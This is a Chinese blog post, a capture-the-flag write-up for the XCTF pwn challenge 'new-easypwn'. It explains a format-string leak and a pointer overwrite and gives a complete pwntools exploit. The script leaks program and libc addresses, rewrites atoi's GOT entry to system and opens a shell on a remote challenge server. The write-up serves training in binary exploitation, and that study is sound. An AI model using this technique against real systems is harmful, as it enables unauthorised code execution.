<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/hack-tech/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/hack-tech/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/hack-tech/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/hack-tech/images/logo.svg" color="#222">

<link rel="stylesheet" href="/hack-tech/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ccomoss.github.io","root":"/hack-tech/","images":"/hack-tech/images","scheme":"Gemini","darkmode":true,"version":"8.17.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/hack-tech/js/config.js"></script>

    <meta name="description" content="利用思路 checksec查一下  程序有4个功能函数，其中show()函数中存在格式化字符串漏洞  一般的格式化字符串漏洞，可以通过覆盖栈上的返回地址，来达到命令执行的目的。但是这个题，格式化字符串中的变量是一个全局变量，在bss段，没办法直接覆盖返回地址。">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-Pwn-GFSJ0922-new-easypwn">
<meta property="og:url" content="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/index.html">
<meta property="og:site_name" content="COSMOS">
<meta property="og:description" content="利用思路 checksec查一下  程序有4个功能函数，其中show()函数中存在格式化字符串漏洞  一般的格式化字符串漏洞，可以通过覆盖栈上的返回地址，来达到命令执行的目的。但是这个题，格式化字符串中的变量是一个全局变量，在bss段，没办法直接覆盖返回地址。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/1.png">
<meta property="og:image" content="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/2.png">
<meta property="og:image" content="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/3.png">
<meta property="article:published_time" content="2023-07-23T16:34:28.000Z">
<meta property="article:modified_time" content="2023-07-24T14:11:42.159Z">
<meta property="article:author" content="qinglong-huang">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/1.png">


<link rel="canonical" href="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/","path":"2023/07/24/pwn-GFSJ0922/","title":"攻防世界-Pwn-GFSJ0922-new-easypwn"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>攻防世界-Pwn-GFSJ0922-new-easypwn | COSMOS</title>
  








  <noscript>
    <link rel="stylesheet" href="/hack-tech/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/hack-tech/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">COSMOS</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/hack-tech/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-二进制安全"><a href="/hack-tech/categories/binary" rel="section"><i class="fa fa-th fa-fw"></i>二进制安全</a></li><li class="menu-item menu-item-密码学"><a href="/hack-tech/categories/crypto" rel="section"><i class="fa fa-th fa-fw"></i>密码学</a></li><li class="menu-item menu-item-ctf"><a href="/hack-tech/categories/ctf-wp" rel="section"><i class="fa fa-th fa-fw"></i>CTF</a></li><li class="menu-item menu-item-archives"><a href="/hack-tech/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="nav-number">1.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%8C%E6%95%B4exp"><span class="nav-number">3.</span> <span class="nav-text">完整exp</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">qinglong-huang</p>
  <div class="site-description" itemprop="description">一个杂记小站，专注网络安全相关的内容</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/hack-tech/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/hack-tech/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ccomoss.github.io/hack-tech/2023/07/24/pwn-GFSJ0922/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/hack-tech/images/avatar.gif">
      <meta itemprop="name" content="qinglong-huang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="COSMOS">
      <meta itemprop="description" content="一个杂记小站，专注网络安全相关的内容">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="攻防世界-Pwn-GFSJ0922-new-easypwn | COSMOS">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          攻防世界-Pwn-GFSJ0922-new-easypwn
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-07-24 00:34:28 / 修改时间：22:11:42" itemprop="dateCreated datePublished" datetime="2023-07-24T00:34:28+08:00">2023-07-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/hack-tech/categories/ctf-wp/" itemprop="url" rel="index"><span itemprop="name">ctf_wp</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="利用思路">利用思路</h2>
<p>checksec查一下 <img src="/hack-tech/2023/07/24/pwn-GFSJ0922/1.png" class="">
程序有4个功能函数，其中show()函数中存在格式化字符串漏洞
<img src="/hack-tech/2023/07/24/pwn-GFSJ0922/2.png" class=""></p>
<p>一般的格式化字符串漏洞，可以通过覆盖栈上的返回地址，来达到命令执行的目的。但是这个题，格式化字符串中的变量是一个全局变量，在bss段，没办法直接覆盖返回地址。
<span id="more"></span>
继续看上图，可以看到用户的输入是通过一个结构体来存储的，第14行明显是一个地址</p>
<p>该结构体由三个字段组成：phone number（11 bytes）、name（13
bytes）、des info指针（8
bytes）。而在add()中，使用scanf接收用户输入，这就给了我们越界写的机会。可以覆盖des
info指针，这就导致可以进行任意地址写。</p>
<p>接下来，想要完成RCE，就需要找到一个合适的位置或者函数，来构造system('/bin/sh')，这样的结构在menu()函数中可以找到，如下图：
<img src="3.png" /></p>
<p>因为buf是可控输入内容，如果输入/bin/sh，然后将atoi的got表地址改为system函数的地址，就可以达成RCE。</p>
<h2 id="漏洞利用">漏洞利用</h2>
<p>根据上面分析的思路，由于程序开启PIE，因此需要首先计算程序基址后，再计算atoi()的got表地址</p>
<p>GDB在格式化字符串漏洞位置打一个断点 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">starti</span></span><br><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">b *<span class="variable">$rebase</span>(0x1190)</span></span><br></pre></td></tr></table></figure> <img
src="4.png" /></p>
<p>在发生格式化字符串时，可以获取到show()函数的返回地址（即main()函数中，调用show()之后的那条指令）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="string">&quot;%9$p&quot;</span>) <span class="comment">#show()的返回地址</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">process_base = <span class="built_in">int</span>(p.recvline().decode().split(<span class="string">&#x27;:&#x27;</span>)[<span class="number">1</span>], <span class="number">16</span>) - <span class="number">0x1274</span></span><br><span class="line">atoi_got = process_base + HELLO.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br></pre></td></tr></table></figure>
<p>随后还需要泄露libc的基址，以计算system函数的地址</p>
<p>同样，根据上面的图，可以看到栈上0x7fffffffdfa8位置处保存的是__libc_start_main+240的地址（这个240的偏移就是实际的偏移，通过glibc_all_in_one获取到对应版本的ld即可找到该偏移）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="string">&quot;%13$p&quot;</span>)   <span class="comment"># __libc_start_main+240</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">libc_base = <span class="built_in">int</span>(p.recvline().decode().split(<span class="string">&#x27;:&#x27;</span>)[<span class="number">1</span>], <span class="number">16</span>) - LIBC.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>] - <span class="number">240</span></span><br><span class="line">system_addr = libc_base + LIBC.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br></pre></td></tr></table></figure>
<p>此时，就可以使用des info处的任意地址写，完成atoi()的got地址覆盖
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&quot;a&quot;</span> * <span class="number">13</span> + p64(atoi_got)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">b&quot;jack&quot;</span>, payload, p64(system_addr))  <span class="comment"># PS.本地环境调试时，scanf会出现空格(\x20)截断，导致des info的地址无法被覆盖</span></span><br></pre></td></tr></table></figure></p>
<h2 id="完整exp">完整exp</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;61.147.171.105&#x27;</span>, <span class="number">60050</span>)</span><br><span class="line"></span><br><span class="line">LIBC = ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line">HELLO = ELF(<span class="string">&quot;./hello&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">number</span>):</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;your choice&gt;&gt;&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;phone number:&quot;</span>, number.encode())</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;name:&quot;</span>, <span class="string">b&quot;jackson&quot;</span>)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;input des size:&quot;</span>, <span class="string">b&quot;10&quot;</span>)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;des info:&quot;</span>, <span class="string">b&quot;123456789&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">index</span>):</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;your choice&gt;&gt;&quot;</span>, <span class="string">b&quot;3&quot;</span>)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;input index:&quot;</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">index, number, name, des_info</span>):</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;your choice&gt;&gt;&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;input index:&quot;</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;phone number:&quot;</span>, number)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;name:&quot;</span>, name)</span><br><span class="line">  p.sendlineafter(<span class="string">&quot;des info:&quot;</span>, des_info)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Step1 泄露程序基址，计算atoi的got表地址</span></span><br><span class="line">add(<span class="string">&quot;%9$p&quot;</span>) <span class="comment">#show()的返回地址</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">process_base = <span class="built_in">int</span>(p.recvline().decode().split(<span class="string">&#x27;:&#x27;</span>)[<span class="number">1</span>], <span class="number">16</span>) - <span class="number">0x1274</span></span><br><span class="line">atoi_got = process_base + HELLO.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&quot;process_base = &quot;</span> + <span class="built_in">hex</span>(process_base))</span><br><span class="line">log.success(<span class="string">&quot;atoi_got = &quot;</span> + <span class="built_in">hex</span>(atoi_got))</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step2 找到libc基址，并计算system地址</span></span><br><span class="line">add(<span class="string">&quot;%13$p&quot;</span>)   <span class="comment"># __libc_start_main+240</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">libc_base = <span class="built_in">int</span>(p.recvline().decode().split(<span class="string">&#x27;:&#x27;</span>)[<span class="number">1</span>], <span class="number">16</span>) - LIBC.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>] - <span class="number">240</span></span><br><span class="line">system_addr = libc_base + LIBC.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&quot;libc_base = &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">&quot;system_addr = &quot;</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step3 将atoi的got表项改为system的地址</span></span><br><span class="line"><span class="comment"># 这里利用edit()中，去覆盖保存des info的内存地址</span></span><br><span class="line"><span class="comment"># 内存结构为：</span></span><br><span class="line"><span class="comment"># | phone number |   name   | des info address |</span></span><br><span class="line"><span class="comment"># |   11 bytes   | 13 bytes |      8 bytes     |</span></span><br><span class="line">payload = <span class="string">b&quot;a&quot;</span> * <span class="number">13</span> + p64(atoi_got)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">b&quot;jack&quot;</span>, payload, p64(system_addr))  <span class="comment"># PS.本地环境调试时，scanf会出现空格(\x20)截断，导致des info的地址无法被覆盖</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Step4 get shell</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt;&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">b&quot;/bin/sh&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/hack-tech/tags/pwn/" rel="tag"># pwn</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/hack-tech/2023/07/20/rsa/" rel="prev" title="RSA基本原理和常见攻击手法">
                  <i class="fa fa-chevron-left"></i> RSA基本原理和常见攻击手法
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">qinglong-huang</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/hack-tech/js/comments.js"></script><script src="/hack-tech/js/utils.js"></script><script src="/hack-tech/js/motion.js"></script><script src="/hack-tech/js/next-boot.js"></script>

  






  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/hack-tech/js/third-party/math/mathjax.js"></script>



</body>
</html>
